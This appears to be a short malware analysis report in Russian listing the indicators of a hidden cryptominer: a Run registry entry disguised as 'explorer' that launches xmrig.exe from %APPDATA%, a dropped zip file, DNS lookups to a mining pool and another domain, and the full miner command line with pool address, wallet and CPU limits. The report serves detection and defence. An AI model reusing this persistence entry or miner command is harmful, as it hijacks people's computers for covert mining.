Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'explorer' = '%APPDATA%\xbooster\xmrig.exe -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 43nZNjoEPp3C1gqjpvaj9UUDyzVwQGVkpcmVHWHucCFFbAHZ...
- %TEMP%\557f.tmp.zip
- %APPDATA%\xbooster\xmrig.exe
- 'xm#####.nanopool.org':14444
- 'xm#####.nanopool.org':14444
- DNS ASK xm#####.nanopool.org
- DNS ASK zt##cker.ml
- '%APPDATA%\xbooster\xmrig.exe' -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 43nZNjoEPp3C1gqjpvaj9UUDyzVwQGVkpcmVHWHucCFFbAHZAgNjUbUYaHgTTijPs17ZBYWjsVEDBJuYhDXCJpnq76sma7o/778 -p x --donate-level=1 -B --max-cpu-usage=90 -t...